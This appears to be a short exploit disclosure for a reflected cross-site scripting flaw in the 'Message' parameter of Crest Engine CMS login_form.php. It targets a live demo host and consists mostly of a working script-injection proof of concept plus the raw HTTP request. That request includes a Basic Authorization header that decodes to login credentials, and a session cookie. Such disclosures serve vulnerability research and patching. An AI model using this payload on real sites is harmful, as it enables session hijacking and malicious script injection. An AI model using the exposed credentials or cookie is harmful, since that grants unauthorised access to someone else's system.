Share
## https://sploitus.com/exploit?id=PACKETSTORM:189506
# Exploit Title: Crest Engine CMS -  Reflected Cross-Site Scripting (XSS)
    # Exploit Author: wa-3, Telegram: @wa0_3
    # Vendor Homepage: http://e-gate.me/
    # Version: 1.0
    # Tested on: http://demo.e-gate.me/
    
    Vulnerable path:/crest/engine/
    Vulnerable file:login_form.php
    Vulnerable Parameter:Message
    
    Poc: /crest/engine/login_form.php?Message="></><script>alert('test')</script>
    Host: demo.e-gate.me
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Basic dGhhbmFhOlNAbTBoMw==
    Connection: keep-alive
    Cookie: PHPSESSID=23gq4mrf9fhil9i4q9htbo62p1
    Upgrade-Insecure-Requests: 1
    
    Response came back with a popup "test" alert.